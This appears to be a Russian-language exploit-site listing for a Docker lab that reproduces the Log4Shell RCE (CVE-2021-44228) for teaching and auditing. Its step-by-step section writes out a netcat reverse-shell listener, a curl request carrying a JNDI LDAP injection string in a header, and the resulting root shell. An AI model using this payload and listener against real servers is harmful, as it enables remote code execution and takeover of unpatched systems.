## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MAFO-SEC-MI-LABORATORIO-LOG4SHELL
# 🚀 Автоматизированная лаборатория Log4Shell (CVE-2021-44228) Play & Plug
Автоматизированная, однокомандная лаборатория для исследований безопасности, предназначенная для демонстрации и аудита уязвимости **Log4Shell (CVE-2021-44228)** удаленного выполнения кода (RCE).
Этот проект объединяет все необходимые компоненты (уязвимое приложение, вредоносный LDAP-сервер перенаправления и инструменты атакующего) в единую изолированную сетевую инфраструктуру с использованием Docker Compose.
* * *
## ⚙️ Ключевые особенности
* **100% Plug & Play:** Не требуется ручная настройка IP, редактирование файла `.env` или согласование сети. Все разрешается автоматически через внутренний DNS Docker.
* **Совместимость байт-кода:** Эксплойт-код автоматически кросс-компилируется для обеспечения совместимости с более старой архитектурой виртуальной машины Java (JVM) жертвы, устраняя проблемы `UnsupportedClassVersionError`.
* **Централизованное развертывание:** Полностью управляется единым оркестрационным слоем и интерактивным менеджером Bash-скриптов (`configurar.sh`), который автоматизирует удаление контейнеров, очистку кэша и пересборку.
* * *
## 🏗️ Обзор архитектуры
Лаборатория создает изолированную мостовую сеть (`red-log4shell`) с тремя ключевыми участниками:
1. **Жертва (`web-vulnerable`):** Веб-приложение Spring Boot, использующее непропатченную уязвимую версию Log4j (`2.14.1`) на **Java 8u111**.
2. **LDAP-сервер (`ldap-malicioso`):** Работает на `marshalsec` для перехвата входящих запросов поиска и динамического перенаправления жертвы на нагрузку атакующего.
3. **Атакующий (`kali-tools`):** Пользовательский контейнер Kali Linux, который размещает HTTP-сервер Python для доставки скомпилированной нагрузки эксплойта (`Exploit.class`) и слушатель Netcat для получения реверс-шелла.
* * *
## ⚙️ Быстрый запуск
Для развертывания этой лаборатории на любой Linux-машине с установленным Docker выполните следующие команды в терминале:
root@kitploit:~
# 1. Clone the repository
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git
# 2. Navigate to the project directory
cd mi-laboratorio-log4shell
# 3. Grant execution permissions to the script manager and launch the lab
chmod +x configurar.sh
./configurar.sh
* * *
🚀 Как провести эксплуатацию (пошагово)
Как только инфраструктура автоматически запустится с помощью скрипта, выполните следующие шаги, чтобы инициировать эксплойт и перехватить реверс-шелл.
Шаг 1: Настройка слушателя Netcat
Откройте новый терминал на вашей хост-машине (Ubuntu) и подключитесь к контейнеру атакующего, чтобы перевести Netcat в режим ожидания входящих подключений:
root@kitploit:~
sudo docker exec -it kali-tools bash
Внутри контейнера Kali запустите слушатель:
root@kitploit:~
nc -lvnp 4444
Вы увидите сообщение: listening on [any] 4444 ...
Шаг 2: Запуск вектора атаки
Откройте еще один отдельный терминал на хост-машине и отправьте вредоносную строку внедрения JNDI, встроенную в заголовок X-Api-Version:
root@kitploit:~
curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'
Шаг 3: Проверка реверс-шелла
Вернитесь к вашему терминалу Netcat. Вы должны увидеть активное соединение. Теперь вы можете выполнять команды от имени root внутри сервера-жертвы:
root@kitploit:~
connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164
whoami
root
* * *
## ⚠️ Отказ от ответственности
Этот репозиторий создан строго для **образовательных целей, исследований в области безопасности и авторизованного академического аудита**. Никогда не выполняйте эти инструменты или атаку на инфраструктуру без явного предварительного письменного разрешения владельцев инфраструктуры.